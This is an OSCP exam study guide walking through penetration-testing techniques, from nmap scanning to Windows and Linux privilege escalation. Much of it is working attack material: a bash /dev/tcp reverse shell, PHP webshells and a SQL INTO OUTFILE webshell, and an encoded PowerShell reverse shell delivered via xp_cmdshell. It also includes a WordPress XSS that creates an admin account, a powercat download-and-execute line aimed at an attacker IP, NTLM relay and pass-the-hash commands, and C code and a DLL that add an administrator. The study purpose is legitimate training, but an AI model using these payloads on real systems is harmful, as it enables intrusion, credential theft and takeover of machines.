Notes and study guide for the OSCP certification.

Generates high amount of trafic in the scanned machine, so we must know this can be recognized by traffic analyzers or packet scanners. The more ports are open, the more traffic is generated. A scan of all 65535 ports will generate about 4MBs of traffic. A full TCP/UDP scan on all the ports for 254 hosts (eg: 192.168.1.0/24) can reach over 1GB of traffic over the time for the scanned machine. That for sure can be detected.

nmap -Ss <target>

Send SYN request to a machine, whitout handshake. In this way a SYN-ACK is sent back to the sender and we know the port is open. The requester at the end does not send the final ACK, resulting in less noise in the network. In this way less traffic and less steps are done in the scan process.

nmap <target>

Performs a full TCP connection. This is the default method of NMAP. It takes longer because the handshake is completed.

nmap -sU <target>

Apart from port-specific protocols, like SMTP or others, it sends an ICMP (ICMP port unreachable method) packet to the receiver port and wait for response. Here (but not only here) sudo is required because the system access the raw socket in order to implement the IPv4 protocol in user space. This is because sending and receiving raw packets requires root access on a Unix or Mac system. On Windows, you will have to use an administrator account.

nmap -sn <target-range>

The discovery sends the UDP requests, but also a TCP SYN packet to port 443 and a TCP ACK packet to port 80 and ICMP requests for the traditional ping sweep. This is done for each host. For a specific sweep, it could be used a more effective scan with:

nmap -p <PORT> <target>

nmap -sT <target>

nmap -A <target>

nmap -O <target>

Try to guess the operating system behind the server, based on how the server is responding. This is effective because the TCP/IP stack is implemeted differently in the Operating Systems. The result fingreprint is then matched with a list of fingerprint of many OS. Adding --osscan-guess we get a guess of the OS.

nmap -sV <target>

In order to have a better understanding of the service we can try to read the server fingerprint for that port. This increase the traffic for the scan.

nmap -sV -sC --script=banner -p 80,443 <target>

With the directive --script we can specify the script we want. With the -sC the "default" scripts are used. In this case we only want HTTP/HTTPS banners, so we scan only the 80 and 443 ports.

Integrates user created script for automated scanning. To read more about the script we are using we can run

nmap --script-help <SCRIPT-NAME>

The list of script can be found at /usr/share/nmap/scripts. To use a custom NMAP script (.nes script) we must download it first from Github and move it in the NMAP script folder. After we run sudo nmap --script-updatedb and we will use the script with

nmap -sV --script "cve-script-name" <target>

Test-NetConnection -Port <PORT> <HOST>

With some powershell scripting, the util Test-NetConnection can be used as a NMAP scan both for TCP and UDP.

1..10000 | % {echo ((New-Object Net.Sockets.TcpClient).Connect("target-ip", $_)) "TCP port $_ is open"} 2>$null

Server Message Block is a protocol used in Microsoft systems to exhange file or messages. It has been attacked over the years and this led to an implementation to a better software: Netbios. Netbios is a session layer protocol that lets computers in the same network communicate and listens on port TCP 139. SMB is on port TCP 445. NBT (Netbios over TCP is often required to run among SMB for compatibility). There are many useful tools to scan Netbios, like NMAP or nbtscan. The following scenario uses -r that indicates nbtscan to use port UDP 137, the Netbios Name service port.

sudo nbtscan -r <target-range>

To scan for SMB shares it can be used the tool enum4linux and then the connection can be tested with

smbclient -L //<IP>

With -L for share listing and then

smbclient //<IP> -U <USER>

To connect to a specific share (in this case without password protection)

NMAP offers too many scripts for enumeration or information gathering on Windows Host with Netbios enabled (eg: --script smb-os-discovery). From Windows the smb connections can be tested with

net view \\<host> /all

With /all we can list Administrators shares ending with $

SMB can be exploited if the signing is disabled, with a NTLM Relay attack we will cover in the next sections. Systems are susceptible to an NTLM relay attack because the recipient does not verify the content and origin of the message.

Simple Mail Transfer Protocol is a standard protocol for mail transmission. It can be enumerated on port 25 with netcat. We can ask for known users or bruteforce the server for gaining information.

nc -nv <target> 25
> VRFY username
...
> EXPN username

With VRFY (verify) we ask to the server if the username is present and with EXPN (expand) if which mailing lists the user is subscribed to. On a Windows system we can use

Test-NetConnection -Port 25 <target>

Or telnet.

Swaks is a good tool for interacting with SMTP servers. It offers also an easy way to attach files. This is a good alternative to netcat for email sending.

swaks --to [email protected] --from [email protected] --auth LOGIN --auth-user [email protected] --header-X-Test "Header" --server <TARGET-IP> --attach file.txt

Simple Network Management Protocol or SNMP is a UDP based protocol, implemented at the beginning in not a very safe way. It has a database (MIB) with information related to network. The default SNMP port is 161 UDP. Until the third version of this protocol, SNMPv3 this protocol was poorly secured. There are many tools to use here because SNMP can tell us many things about an organization, based on the response of the server. We can use onesixtyone for basic bruteforce and enumeration and snmpwalk to access data in MIB database. The “SNMP community string” is like a user ID or password that allows access to a router's or other device's statistics. SNMP community strings are used only by devices which support the SNMPv1 and SNMPv2c protocol. SNMPv3 uses username/password authentication, along with an encryption key. By convention, most SNMPv1-v2c equipment ships from the factory with a read-only community string set to “public”. It is standard practice for network managers to change all the community strings to customized values in the device setup.

snmpwalk -c public -v1 -t 5 <target>

In this way we enumerate all the MIB tree of a SNMPv1 version with a timeout of 5 seconds, on the target IP.

# MIB Value        Microsoft Windows SNMP parameters
1.3.6.1.2.1.25.1.6.0         System Processes
1.3.6.1.2.1.25.4.2.1.2         Running Programs
1.3.6.1.2.1.25.4.2.1.4         Processes Path
1.3.6.1.2.1.25.2.3.1.4         Storage Units
1.3.6.1.2.1.25.6.3.1.2         Software Name
1.3.6.1.4.1.77.1.2.25         User Accounts
1.3.6.1.2.1.6.13.1.3         TCP Local Ports

To search deeaper use the extend functionality of SNMP. As suggested in HackTricks

apt-get install snmp-mibs-downloader
snmpwalk -v2c -c public <IP> NET-SNMP-EXTEND-MIB::nsExtendOutputFull

Web application penetration testing is the practice of simulating attacks on a system in an attempt to gain access to sensitive data, with the purpose of determining whether a system is secure. These attacks are performed either internally or externally on a system, and they help provide information about the target system, identify vulnerabilities within them, and uncover exploits that could actually compromise the system. It is an essential health check of a system that informs testers whether remediation and security measures are needed.

With NMAP we can get the fingerprint of a webserver.

sudo nmap -p 443,80 --script=http-enum <target>

And can discover most popuar directories open on the server.

We can enumerate WordPress pages and their plugins and themes with wpscan. The following bash line will instruct wpscan to enumerate plugins in aggressive mode and print the output on a file

wpscan --url https://<TARGET> --enumerate p --plugins-detection aggressive -o dir/file.txt

To perform a web tecnology enumeration, and to know for example which service the web server is running, we can use WhatWeb

whatweb <URL>

This is a tool that can discover hidden path in webservers. It uses wordlist to bruteforce directories, files or can perform a Fuzzing / DNS enumeration.

gobuster dir -u <target> -w /path/to/wordlist -t 10

In this case Gobuster is run with 10 threads with a directory bruteforce attack on the given target. Gobuster can also bruteforce APIs path

gobuster dir -u <target> -w /path/to/wordlist -p /path/to/api-pattern

Where the file /path/to/api-pattern is something like that

{GOBUSTER}/v1
{GOBUSTER}v2

Many times custom or not-standard APIs are the most vulnerable. Exploiting a login API, for example, we could log in into a web server with admin privileges.

With -x we can specify file extensions

gobuster dir -u <target> -w /path/to/wordlist -x php js aspx md txt jpg png

Is platform for Web App testing. It can works as a proxy, repeater, intruder, we can use it even for bruteforces attacks and many other things. We use it as proxy that intercepts requests, analyzes it and send them back to the server. The community edition can be used for free. https://portswigger.net/burp. Burp Suite can be configured as a proxy and intercept traffic sent by a Firefox or Chrome browser. Requests can be viewed, modified, dropped etc...

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.

An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page. XSS are divided in two types: stored that remains persistent on the webserver and reflected that are usually crafted to be inserted in a link and run-time executed . The most common string to test an XSS vulnerability is

<script>alert(1)</script>

In a case when our payload is stored actively on the server, for example if we inject an XSS inside the User Agent, the web administrator of the page could see the XSS (the popup) in his administration page (eg. Wordpress Panel). If the XSS is for example a redirect or some dangerous arbitrary code, many bad things can be done.

HTTP cookies, or internet cookies, are built specifically for web browsers to track, personalize and save information about each user’s session. A “session” is the word used to define the amount of time you spend on a site. Cookies are created to identify you when you visit a new website. The web server — which stores the website’s data — sends a short stream of identifying information to your web browser in the form of cookies. This identifying data (known sometimes as “browser cookies”) is processed and read by “name-value” pairs. These pairs tell the cookies where to be sent and what data to recall. Cookies can be found under Storage tab in the Browser inspect settings. Sessions cookies with secure flag can be sent only over HTTPS. The HttpOnly tells the browser to deny JavaScript access to cookies.

WordPress nonces protect the platform against various malicious attacks, particularly cross-site request forgery (CSRF). This cyber attack exploits WordPress security vulnerabilities to trick users into submitting unwanted requests, from changing users’ login details to deleting user accounts. In the following way we can get a Nonce for a dinamically created user.

var ajaxRequest = new XMLHttpRequest();
var requestURL = "/wp-admin/user-new.php";
var nonceRegex = /ser" value="([^"]*?)"/g;
ajaxRequest.open("GET", requestURL, false);
ajaxRequest.send();
var nonceMatch = nonceRegex.exec(ajaxRequest.responseText);
var nonce = nonceMatch[1];

And we can create the new user with

var params = "action=createuser&_wpnonce_create-user="+nonce+"&user_login=attacker&[email protected]&pass1=attackerpass&pass2=attackerpass&role=administrator";
ajaxRequest = new XMLHttpRequest();
ajaxRequest.open("POST", requestURL, true);
ajaxRequest.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
ajaxRequest.send(params);

We can then minify the attack with something like JSCompress and encode it in UTF-16 integer with Cyberchef or charCodeAt JS function. At this point we only need to find a way to inject it in the Server in a persistent way (XSS Stored). This can be done if the PHP part of the server doesn't sanitize input in the User-Agent or other parameters of the requerst headers. Once we got the admin access we can craft or use a WebShell plugin to enumerate and exploit the system. We can use something like https://github.com/p0dalirius/Wordpress-webshell-plugin.

A path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files. It should be noted that access to files is limited by system operational access control (such as in the case of locked or in-use files on the Microsoft Windows operating system). Local file inclusion (also known as LFI) is the process of including files, that are already locally present on the server, through the exploiting of vulnerable inclusion procedures implemented in the application. This vulnerability occurs, for example, when a page receives, as input, the path to the file that has to be included and this input is not properly sanitized, allowing directory traversal characters (such as dot-dot-slash) to be injected. Although most examples point to vulnerable PHP scripts, we should keep in mind that it is also common in other technologies such as JSP, ASP and others.

Exploiting a Path Traversal and a LFI in a server, could led us to open shell using a simple reverse shell bash oneliner, if we poison some part of the system, for example the Apache Logs in a Linux system, eg: Apache Log Poisoning through LFI.

bash -i >& /dev/tcp/<IP>/4000 0>&1

Remote File Inclusion or RFI is done the same way of LFI, but we have to be the source of the malicious script. In the case of a PHP webserver, It could be

<?php
if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}
?>

And we can call the script with an inclusion of it, eg: http://webserver.com/index.php?page=http://<attacker-ip>/malicious-file.php . On the attacker side we have first to launch a webserver with the malicious file with

python3 -m http.server 80

For more examples, visit https://pentestmonkey.net/tools/web-shells/php-reverse-shell. Going on, with File Upload vulnerabilities we can do a lot of things. A part from uploading a reverse-shell.php, we can also upload in specific places of the filesystem, dangerous file that could replace original ones. For example, replacing the /etc/passwd and the /etc/shadow file in a system, we could gain permission to log in with a "pre crafted" user. This can be done exploiting a File Upload with something like ../../../../../../../../etc/passwd and ../../../../../../../../etc/shadow if the server doesn't sanitize file names.

Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.

This attack differs from Code Injection, in that code injection allows the attacker to add their own code that is then executed by the application. In Command Injection, the attacker extends the default functionality of the application, which execute system commands, without the necessity of injecting code. For example if a web server executes a command on the operating system below and doesn't sanitize the input, could let the attacker craft a payload with some special characters like ; or && that are used to concatenate commands in a sytem. A pratical example could be a server that arguments for a known command, eg: ls

http://<target-url>/pages/command=cmd=ls;id

In that case the webserver executes ls among with the id command.

SQL Injections are the most common form of injections because SQL databases are very popular in dynamic web applications. This vulnerability allows an attacker to tamper existing SQL queries performed by the web application. Depending on the queries, the attacker might be able to access, modify or even destroy data from the database. Since databases are commonly used to store private data, such as authentication information, personal user data and site content, if an attacker gains access to it, the consequences are typically very severe, ranging from defacement of the web application to users data leakage or loss, or even full control of the web application or database server.

When an application is vulnerable to SQL injection, and the results of the query are returned within the application's responses, you can use the UNION keyword to retrieve data from other tables within the database. This is commonly known as a SQL injection UNION attack.

Blind SQL (Structured Query Language) injection is a type of SQL Injection attack that asks the database true or false questions and determines the answer based on the applications response. This attack is often used when the web application is configured to show generic error messages, but has not mitigated the code that is vulnerable to SQL injection. When an attacker exploits SQL injection, sometimes the web application displays error messages from the database complaining that the SQL Query’s syntax is incorrect. Blind SQL injection is nearly identical to normal SQL Injection, the only difference being the way the data is retrieved from the database. When the database does not output data to the web page, an attacker is forced to steal data by asking the database a series of true or false questions. This makes exploiting the SQL Injection vulnerability more difficult, but not impossible.

This is a SQL Injection cheat sheet for testing https://github.com/payloadbox/sql-injection-payload-list.

In MSSQL thanks to the keyword execute, we can execute arbitrary command on the operating system below. To do that first we have to enable command execution inside the Database with

EXECUTE sp_configure 'show advanced options', 1;
RECONFIGURE;
EXECUTE sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

Then execute commands with

EXECUTE xp_cmdshell 'whoami'

Putting all togheter, we can have very fancy injections adding multiple tools.

We can use impacket-mssqlclient with -windows-auth as login method in the MSSQL Database

proxychains python3 /home/kali/.local/bin/mssqlclient.py -port 1433 domain.com/user:password@<IP> -windows-auth

The following payload has been crafted with https://www.revshells.com/

'; EXECUTE xp_cmdshell 'powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADQANQAuADIAMAA4ACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA=='; --

In other database scenarios we can abuse the SELECT INTO_OUTFILE statement and we can try to upload something malicious in the webserver. We must have write permission in the folder we will write the file into.

' UNION SELECT "<?php system($_GET['cmd']);?>", null, null, null, null INTO OUTFILE "/var/www/html/tmp/webshell.php" -- //

Next, with a simple GET request like /tmp/cmd=whoami we can execute commands on the webserver.

Finally, we can use something that automates the SQL exploits, like sqlmap. With this tool we can have automatic scan and checks for any type of vulnerability on the webserver using SQL and It can also automatically upload reverse shells to the server. For more information check directly the project documentation https://github.com/sqlmapproject/sqlmap. A basic usage of sqlmap could be the following code

sqlmap -u 'http://<target>/page.php?user=test' -p user

A Client Side Attack is an attack executed on client side. It could be in the victim's browser or in the victim's computer through malicious executables. This is usually a two-steps attack. In the first step usually we deploy the payload to the victim infrastructure using social engineer and OSINT. After the victim double-clicked the malicious file we sent or opened the malicious link, we can execute arbitrary code for any sort of action we want to do. The aim of Client Side Attacks is to gain an initial foothold in a non-routable internal network.

We can craft a malicious Word file is very easy, Microsoft offers a very good guide to do it :) https://support.microsoft.com/it-it/office/creare-o-eseguire-una-macro-c6b99036-905c-49a6-818a-dfb98b7c3c9c. Inside the macro section we can insert a malicious reverse shell using https://github.com/glowbase/macro_reverse_shell that is a useful tool to craft fixed-size strings supported by Microsoft Macros. On client side we open the reverse shell with

nc -lvp <PORT>

With Windows libraries we can craft client-side attacks on Windows. We can serve this configuration for a WebDav mount on the victim's computer. First we start or WebDav listener in the Kali machine with

wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root .

We can craft the following config.Library-ms file.

<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>@windows.storage.dll,-34582</name>
<version>6</version>
<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1003</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<isSupported>false</isSupported>
<simpleLocation>
<url>http://<ATTACKER-IP></url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>

Then we can upload to the WebDAV a malicious Windows Shortcut file (lnk file) that points to the attacker malicious ip that servers a malicious exe for a reverseshell, like powercat. In this section, a simple reverse shell won't work, but we have to use some webserver (like python webserver) with the executable available. Something like that could work for Windows 10/11

powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://ATTACKER-IP:WEBPORT/powercat.ps1');
powercat -c ATTACKER-IP-NETCAT -p NETCAT-PORT -e powershell"

We copy inside the WebDAV the the link of the powershell command previously created and also the config-Library.ms file that we will send to the victim as the payload (via MAIL, SMB, etc...).

with our netcat listener on the attacker side.

nc -lvp NETCAT-PORT

Mainly there are two locations where you can find exploits. Make sure you run exploits ONLY AFTER have read the code.

https://www.exploit-db.com/
https://www.metasploit.com/

Or inside the Linux installation of NMAP at /usr/share/nmap/scripts.

We can bruteforce logins with Password Attack metodology. This type of attacks uses a dictionary of usernames/passwords and tries to guess the credentials in the applications. It could be HTTPS, SSH, RDP etc...

A very good tool for password bruteforcing is hydra.

The following attack uses the wordlist.txt file to bruteforce the admin user for SSH login.

hydra -L admin -P wordlist.txt <target-ip> ssh -t 4

If the password is know, It could be used the tecnique password spraying where the passwords remain constant and the username is bruteforced. This is useful if we gain passwords from a dataleak.

A RDP attack could be this

hydra -L Administrator -P wordlist.txt <target-ip> rdp -t 4

This works with HTTP basic auth protocol

hydra -l admin -P rockyou.txt <target-ip> http-get

With John and Hashcat we can craft customized mutating wordlist that let us modify the original wordlist while executing. In the Hashcat Wiki are shown all possible combinations for password mutation. For example, the following rule capitalizes each first letter and adds 1 and then ! for each word.

c $1
c $!

For a wordlist with the single word test, this will create the following mutated wordlist

Test1
Test!

The attack will be the following

hashcat --wordlist=/usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/my-rule.rule user.hash

If we dump a KeePass Database (Database.kdbx), we can try to crack it with

keepass2john Database.kdbx > keepass.hash

First we remove the "Database:" string from the hash, then we run our attack. The 13400 is the code for Hashcat to crack KeePass hashes.

hashcat -m 13400 keepass.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/rockyou-30000.rule --force

If we find a SSH Key password protected we can use

ssh2john id_rsa > id_rsa.hash

We remove the filename at the beginning of the hash, as in the KeePass section and we use JohnTheRipper to crack the hash, but first we add our hashcat rules to the John configuration rules (if we want to use custom rules)

cat /home/kali/passwordattacks/my-rule.rule >> /etc/john/john.conf

And then the attack is run with

john --wordlist=ssh.passwords --rules=sshRules id_rsa.hash

Now we can login with the SSH key and we can use the cracked passphrase.

The NTLM hash is the cryptographic format in which user passwords are stored on Windows systems. NTLM hashes are stored in the SAM (security account manager) or NTDS file of a domain controller. They are a fundamental part of the mechanism used to authenticate a user through different communications protocols. It’s, therefore, critical information and highly sought after by hostile actors when trying to unleash a cyber-attack. When pentesting, for example, it’s common for attackers to try to obtain these hashes (using tools such as pwdump or mimikatz) and use Pass The Hash techniques using NTLM hashes to exploit the privileges of one or more systems. In this way, they could execute elevated privileges and even execute commands. The NTLM hash is encoded by taking the user’s password and converting it into a 16-byte key using an MD4 hash function. This key is divided into two halves of 8 bytes each, which are used as input to three rounds of DES encryption to generate a 16-byte output that represents the NTLM hash. Each DES round uses an 8-byte key derived from the original key half using a parity operation. The two 8-byte results from the three DES rounds are concatenated to form the 16-byte NTLM hash that is used to verify the user’s password in the Windows operating system. NTLM hashes are likely to be used in many Windows authentication attacks, so it’s advisable to limit their use and use Kerberos.

Mimikatz is a very useful tool that can do many things once executed on a Windows system, like dumping NTML hashes of the users. As their Github page says, it can be run with

.\mimikatz.exe

Warning: Mimikatz's commands could not work depending on the Windows version. Make sure to download the correct version after checking with systeminfo the Windows version.

Then, if we have the privileges, it can be used to dump NTLM hashes with

privilege::debug
token::elevate
lsadump::sam

To impersonate another user

 sekurlsa::pth /user:Administrator /domain:<DOMAI> /ntlm:<NTLM-HASH> /impersonate

The 1000 code is for NTLM hashes. The username is dump along with the hash. The cracking is done with the following code

hashcat -m 1000 user.hash /usr/share/wordlists/rockyou.txt

The plaintext credential we will find are used in the authentication method in the Windows system, like RDP, SMB or other services, if the user has the required privileges to use that services.

The NTLM hashe can be used also as is if the protocol supports it. An example is SMB

smbclient \\\\<TARGET-IP>\\secrets -U Administrator --pw-nt-hash <NTLM-HASH>

We can escalate the writables shares with impacket-psexec, a oneliner tool that opens a reverse shell with the exploited target.

impacket-psexec -hashes 00000000000000000000000000000000:<NTLM-HASH> Administrator@<TARGET-IP>

One of the authentication protocols Windows machines use to authenticate across the network is a challenge / response / validation called Net-NTLMv2. If can get a Windows machine to engage my machine with one of these requests, we can perform an offline cracking to attempt to retrieve their password. In some cases, we could also do a relay attack to authenticate directly to some other server in the network.

Once identified our interface, we can start our interceptor with

sudo responder -I <INTERFACE>

And from the Victim we only need to mount as a SMB share a fake provided path

dir \\<ATTACKER-IP>\test

In this way responder will dump the hash that could be cracked with code 5600 on hashcat

hashcat -m 5600 user.hash /usr/share/wordlists/rockyou.txt --force

We can perform a ntlmrelayx attack if the gained hash is too difficult to be cracked. In this case the <TARGET-IP> is the second exploitable machine on the network.

impacket-ntlmrelayx --no-http-server -smb2support -t <TARGET-IP> -c "powershell -enc <ENCODED-REVSHELL>"

The encoded reverse shell can be crafted with some UTF16-BE malicious code crafted with https://www.revshells.com. Then, we have to gain the hash from the first machine. We can do the same attack as before, mounting on the machine 1 the fake SMB share, in order to gain the hash.

dir \\<ATTACKER-IP>\test

Now we impacket-ntlmrelayx will pass the hash to the second machine to authenticate us with the same hash. If the user is also the Administrator of the second machine, we will be logged as Administrator.

We can use Seatbelt and WinPeas and then investigate on the results. It is also useful to check Powershell history and Windows Event Viewer. If the result for Windows doesn't display colors, add this REG value

 REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1 

As always, enumerate all the possible things, login to SMB/SSH/Other services with default userames ad passwords or perform a null login as the following

For rpcclient

rpcclient 10.10.10.192 -U""

For for smbclient

smbclient -L 10.10.10.192 -U""

Another useful tool to check privilege escalation vector is PowerUp. We can upload it on the victim's machine and then use it to gain knowledge and exploit the privileges misconfiguration on the services. First, we enable the powershell scripting capability.

powershell -ep bypass

Then we enable PowerUp

. .\PowerUp.ps1

To list modifiable service we use

Get-ModifiableServiceFile

Once we spot an interesting service, we can try to abuse it with

Install-ServiceBinary -Name '<SERVICENAME>'

This will create the admin user john with password Password123!. To log-in with the created user we can restart the service (if we have the correct permissions and PowerUp.ps1 automatically uses the right arguments). Eventuall we can restart the machine in order to have all services restarted. We also must notice that if the service requrie some additional configurations, for example passing a configuration file, the PowerUp.ps1 script will fail and we must exploit manually the privilege escalation, setting the right path to the configurations of the service (eg: mysql).

If we have to manually load a custom exploit into the service we can directly write the C code and compile it for our needs

#include <stdlib.h>

int main ()
{
  int payload;
  
  payload = system ("net user john Password123! /add");
  payload = system ("net localgroup administrators john /add");
  
  return 0;
}

And then compile it with

x86_64-w64-mingw32-gcc payload.c -o payload.exe

DLL are the specular 'Shared Object' on Linux. They are libraries that provide functionalities for executable programs. With the program Process Monitor we can monitor program calls. If we find that a program calls a DLL that is missing, it may be replaced (if we have the correct read/write permissions) by our malicious DLL. We can craft the DLL following Microsoft's guidelines and insert into the case DLL_PROCESS_ATTACHED our code. The code can be similar to the previous code for the manual privilege escalation using Windows services.

This is the order Windows search for DLLs

1. The directory from which the application loaded.
2. The system directory.
3. The 16-bit system directory.
4. The Windows directory. 
5. The current directory.
6. The directories that are listed in the PATH environment variable.

The following C program can be used to exploit a missing DLL

#include <stdlib.h>
#include <windows.h>

BOOL APIENTRY DllMain(
HANDLE hModule,// Handle to DLL module
DWORD ul_reason_for_call,// Reason for calling function
LPVOID lpReserved ) // Reserved
{
    switch ( ul_reason_for_call )
    {
        case DLL_PROCESS_ATTACH: // A process is loading the DLL.
        int payload;
        payload = system ("net user john Password123! /add");
        payload = system ("net localgroup administrators john /add");
        break;
        case DLL_THREAD_ATTACH: // A process is creating a new thread.
        break;
        case DLL_THREAD_DETACH: // A thread exits normally.
        break;
        case DLL_PROCESS_DETACH: // A process unloads the DLL.
        break;
    }
    return TRUE;
}

We will then compile it on the linux machine with the --shared option and we load it in the Windows machine in the path and with the name that Windows expect the DLL to have. Obviously this works only if we have the WRITE permission on that files.

x86_64-w64-mingw32-gcc calledDll.cpp --shared -o calledDll.dll

Trasnfer the file and restart the service with

Restart-Service <SERVICENAME>

And we will be able to execute a shell as admin with the user john. We could not be able to log-in via RDP because the user may not be in the RDP group.

When a service is created whose executable path contains spaces and isn’t enclosed within quotes, leads to a vulnerability known as Unquoted Service Path which allows a user to gain SYSTEM privileges (only if the vulnerable service is running with SYSTEM privilege level which most of the time it is). In Windows, if the service is not enclosed within quotes and is having spaces, it would handle the space as a break and pass the rest of the service path as an argument.

We find unquoted paths with the command

wmic service get name,pathname |  findstr /i /v "C:\Windows\\" | findstr /i /v """

We must check if we have write permissions on the executable in order to replace it with a new one.

icacls "C:\Program Files\Enterprise Apps\path\to\service.exe"

Then if we have permission on the service we can start or stop it with Start-Service or Stop-Service command. Once we got the paths we can use PowerUp.ps1 for exploting the service. This means the service will be replaced with a malicious exe.

Get-UnquotedService
powershell -ep bypass
. .\PowerUp.ps1

And finally we run the command to overwrite the service with

Write-ServiceBinary -Name 'GammaService' -Path "C:\Program Files\Enterprise Apps\Current.exe"

Now restarting the service will grant us an Administrator account with user john and Password123! as credentials

Restart-Service GammaService

If a task is executed periodically, we can exploit the called program if we have write permissions on it. To seek for scheduled tasks we can run.

schtasks /query /fo LIST /v

Eventually we can use findstr if we want to search for something specific. After that we can replace the program with a simple .exe that creates a new admin user.

We can watch status of Windows services with Watch-Command

We can use multiple exploits for Windows, depending on the privileges we got on the system. An example could be PrintSpoofer. We could serve it on the victim machine. If we have SeImpersonatePrivilege privilege displayable with whoami /priv we could gain Admin privileges with

.\PrintSpoofer64.exe -i -c powershell.exe

There is a wide range of this exploits. We can use the whole Potato Family and perform a Privilege Escalation. A real-life scenario of a Windows privilege escaltion could be exploiting the SeBackupPrivilege.

After having gained the Administrator access we cam dump SAM and SYSTEM using reg.exe

reg save hklm\sam C:\temp\SAM
reg save hklm\system C:\temp\SYSTEM

Once copied back on the Kali machine the two files we can dump them with

impacket-secretsdump -sam SAM -system SYSTEM LOCAL

or

samdump2 SYSTEM SAM

This will give us a list of userame:hash that can be cracked using hashcat's NTLM cracking or used for a Pass The Hash attack. Other ways to perform a SAM and SYSTEM credential dumping are explained here. Many scenarios about dumping SAM ad SYSTEM can be found here.

Due to unsafe .Net Deserialization we can exploit the system using UAC Bypass.

PS C:\Windows\Tasks> Import-Module .\Invoke-EventViewer.ps1

PS C:\Windows\Tasks> Invoke-EventViewer 
[-] Usage: Invoke-EventViewer commandhere
Example: Invoke-EventViewer cmd.exe

PS C:\Windows\Tasks> Invoke-EventViewer cmd.exe
[+] Running
[1] Crafting Payload
[2] Writing Payload
[+] EventViewer Folder exists
[3] Finally, invoking eventvwr

Always check installed programs under C:\Program Files(x86) or under folders as Downloads or Documents. We can find exploitable programs (search the program name with searchsploit) or interesting files like Keypass vaults or hashed credentials to be cracked. Additioally, if we find some non-standard executable program that requires some sort of credentials for it, just do a strings fileame.exe because the credentials may be hardcoded into it.

We can use many tools like unix-privesc-check or linPEAS and LinEnum to perform an analysis on the possibile privilege escalation vectors on a unix system.

We can perform a password list creation with Crunch.

We can use the GTFOBins to read existent exploitations for binaries in linux. Below more examples.

find utils can be abused and can execute a shell. We use -p to preventing the effective user from being reset.

